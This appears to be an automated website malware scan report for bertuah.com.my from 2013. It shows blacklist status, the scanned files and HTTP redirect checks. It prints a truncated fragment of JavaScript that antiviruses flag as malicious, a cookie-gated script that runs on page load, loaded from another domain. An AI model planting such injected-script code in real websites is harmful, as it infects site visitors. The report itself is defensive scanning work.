Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bertuah.com.my
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bertuah.com.my/ | 200 OK Content-Length: 595 Content-Type: text/html | clean |
http://siu.edu.bd/includes/framework.js | 200 OK Content-Length: 3484 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function browserDetectNav(chrAfterPoint)
{ var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefox\/\w+\.\w+/i, ChromeB = /Chrome\/\w+\.\w+/i, SafariB = /Version\/\w+\.\w+/i, IEB = /MSIE *\d+\.\w+/i, SafariV = /Safari\/\w+\.\w+/i, browser = new Array(), browserSplit = /[ \/\.]/i, return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('HRMSESSION')==777){}else{SetCookie('HRMSESSION', '777', '3', '/'); if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } } } Antivirus reports:
| ||
http://bertuah.com.my/test404page.js | 404 Not Found Content-Length: 484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bertuah.com.my
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Nov 2013 23:21:41 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 595
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...595 bytes of data.
GET / HTTP/1.1
Host: bertuah.com.my
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Nov 2013 23:21:41 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 595
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...595 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bertuah.com.my
Referer: http://www.google.com/search?q=bertuah.com.my
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bertuah.com.my
Referer: http://www.google.com/search?q=bertuah.com.my
Result:
The result is similar to the first query. There are no suspicious redirects found.